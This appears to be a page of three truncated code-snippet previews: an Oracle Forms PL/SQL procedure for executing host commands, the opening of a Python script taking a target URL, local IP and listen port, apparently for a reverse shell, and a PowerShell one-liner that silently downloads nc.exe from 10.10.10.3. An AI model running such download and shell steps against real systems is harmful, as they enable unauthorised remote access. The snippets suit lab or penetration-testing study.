This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PROCEDURE EXEC_CMD(command varchar2) IS | |
| stnd WEBUTIL_HOST.OUTPUT_ARRAY ; | |
| error WEBUTIL_HOST.OUTPUT_ARRAY ; | |
| process WEBUTIL_HOST.PROCESS_ID ; | |
| pass PLS_INTEGER := 0 ; | |
| result varchar2(10000); | |
| BEGIN |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| import urllib.request | |
| import sys | |
| import base64 | |
| if len(sys.argv) != 4: | |
| print('Usage: '+sys.argv[0]+' [URL] [LOCAL_IP] [LISTEN PORT]') | |
| quit() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest https://10.10.10.3/nc.exe -OutFile nc.exe |
